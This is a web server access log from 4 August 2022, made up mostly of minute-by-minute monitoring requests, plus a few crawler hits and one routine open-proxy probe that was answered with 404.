212.91.246.72 - - [04/Aug/2022:07:19:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.209.162 - - [04/Aug/2022:07:19:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.196.220.70 - - [04/Aug/2022:07:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [04/Aug/2022:07:20:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:21:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:22:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:23:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:24:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:25:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:26:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:27:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:28:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:29:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:30:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:31:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:32:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:33:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:34:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:35:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.196.220.70 - - [04/Aug/2022:07:35:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
149.129.50.37 - - [04/Aug/2022:07:35:39 +0200] "GET http://www.1ucn.com/proxychecker/index.php HTTP/1.1" 404 326 "-" "Mozilla/3.0 (WinNT; I)"
64.225.3.187 - - [04/Aug/2022:07:35:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
212.91.246.72 - - [04/Aug/2022:07:36:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.196.220.70 - - [04/Aug/2022:07:36:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.196.220.70 - - [04/Aug/2022:07:37:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [04/Aug/2022:07:37:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:38:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:39:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:40:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.196.220.70 - - [04/Aug/2022:07:40:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [04/Aug/2022:07:41:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:42:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:43:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
